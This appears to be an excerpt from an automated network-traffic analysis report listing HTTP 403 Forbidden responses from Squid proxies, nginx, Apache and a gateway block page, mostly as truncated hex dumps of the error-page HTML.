                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4897Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 23 Feb 2024 08:45:21 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 306Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.22.1Date: Fri, 23 Feb 2024 08:45:22 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 1002X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 6
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
